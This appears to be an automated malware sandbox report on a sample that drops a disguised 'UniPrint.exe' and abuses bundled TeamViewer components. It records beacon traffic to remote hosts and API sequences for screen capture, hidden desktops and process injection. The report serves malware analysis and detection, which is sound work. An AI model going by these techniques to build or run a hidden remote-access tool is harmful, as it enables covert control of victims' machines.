Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: unknownHTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70986B70 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectW,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,2_2_70986B70
Source: wogZe27GBB.exe, 00000000.00000002.248869618.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,0_2_00405042
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098A020 GetCurrentThreadId,GetThreadDesktop,StrChrW,CreateDesktopW,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,2_2_7098A020
Source: wogZe27GBB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040323C
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_70985F30
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70985F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_70985F30
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_004048530_2_00404853
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_004061310_2_00406131
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053C2D64_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004A13AA4_2_004A13AA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053E4304_2_0053E430
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004C97CD4_2_004C97CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_005348104_2_00534810
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_005438ED4_2_005438ED
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004AC8A94_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00544B6A4_2_00544B6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004B9F5A4_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00546FFB4_2_00546FFB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004A0FB24_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292F7CD17_3_0292F7CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292F9EC17_3_0292F9EC
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0292F96517_3_0292F965
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 17_3_0294C17D17_3_0294C17D
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 20_3_02880ABB20_3_02880ABB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0040F6FE appears 62 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053BCB5 appears 419 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053E5C8 appears 32 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0040DFA6 appears 31 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 004A1B0C appears 235 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053BCE8 appears 61 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70983760 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,StrChrW,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,2_2_70983760
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,0_2_00401000
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,2_2_70988AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,2_2_7098B420
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709889F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache,2_2_709889F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B5F0 NtResumeThread,NtClose,HeapFree,2_2_7098B5F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B340 NtGetContextThread,NtSetContextThread,2_2_7098B340
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B570 NtSuspendThread,NtClose,2_2_7098B570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B160 NtProtectVirtualMemory,2_2_7098B160
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,2_2_70981C90
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,2_2_70981A80
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098A880 NtQueryVirtualMemory,2_2_7098A880
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B0B9 NtProtectVirtualMemory,2_2_7098B0B9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709826E0 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,2_2_709826E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,2_2_70985220
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B650 RtlMoveMemory,NtFlushInstructionCache,2_2_7098B650
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70987240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,2_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,2_2_70982440
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B1A0 NtOpenThread,2_2_7098B1A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,2_2_70982FF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709827F0 GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,2_2_709827F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70987D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW,2_2_70987D00
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981570 NtAllocateVirtualMemory,NtAllocateVirtualMemory,2_2_70981570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70981960 NtProtectVirtualMemory,2_2_70981960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_709889F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache,4_2_709889F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B160 NtProtectVirtualMemory,4_2_7098B160
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,4_2_70988AF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70987240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,4_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B340 NtGetContextThread,NtSetContextThread,4_2_7098B340
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,4_2_7098B420
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B5F0 NtResumeThread,NtClose,HeapFree,4_2_7098B5F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70987D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW,4_2_70987D00
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B570 NtSuspendThread,NtClose,4_2_7098B570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098A880 NtQueryVirtualMemory,4_2_7098A880
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B0B9 NtProtectVirtualMemory,4_2_7098B0B9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B1A0 NtOpenThread,4_2_7098B1A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981960 NtProtectVirtualMemory,4_2_70981960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,4_2_70981A80
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70985220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,StrChrW,CloseHandle,CloseHandle,CloseHandle,4_2_70985220
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,4_2_70981C90
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,4_2_70982440
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70981570 NtAllocateVirtualMemory,NtAllocateVirtualMemory,4_2_70981570
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_709826E0 StrChrW,RtlZeroMemory,NtCreateSection,StrChrW,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,StrChrW,NtClose,4_2_709826E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_7098B650 RtlMoveMemory,NtFlushInstructionCache,4_2_7098B650
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_709827F0 GetFileAttributesW,StrChrW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,4_2_709827F0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,4_2_70982FF0
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: No import functions for PE file found
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTV.dllT vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer.exel& vs wogZe27GBB.exe
